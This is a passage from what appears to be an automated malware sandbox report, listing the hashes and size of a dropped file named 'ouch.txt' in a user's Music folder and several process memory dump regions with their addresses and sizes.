                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • C:\Users\Admin\Music\ouch.txt

                                                                                                                      Filesize

                                                                                                                      7B

                                                                                                                      MD5

                                                                                                                      9ef85361be570fc2ae05ca953d53635e

                                                                                                                      SHA1

                                                                                                                      7680abd3180169fe2751d8942618ce6d18b9cf1c

                                                                                                                      SHA256

                                                                                                                      38e3938779399b844ea1fa108e0e2adc4e12cac862de8d4dae181d0beb50d48f

                                                                                                                      SHA512

                                                                                                                      3690810e4b5ad14fb655cd05c681c87bbf436b2d2aa7e9478e9f53e0aae37681e84dd8b534762b2cde4f7e843b13506abc03b1e50fd41732dcef7771eaf47f90

                                                                                                                    • memory/4172-16-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4172-0-0x00007FFACEE03000-0x00007FFACEE05000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4172-12-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4172-1-0x0000023CC9780000-0x0000023CC97A2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/4172-11-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB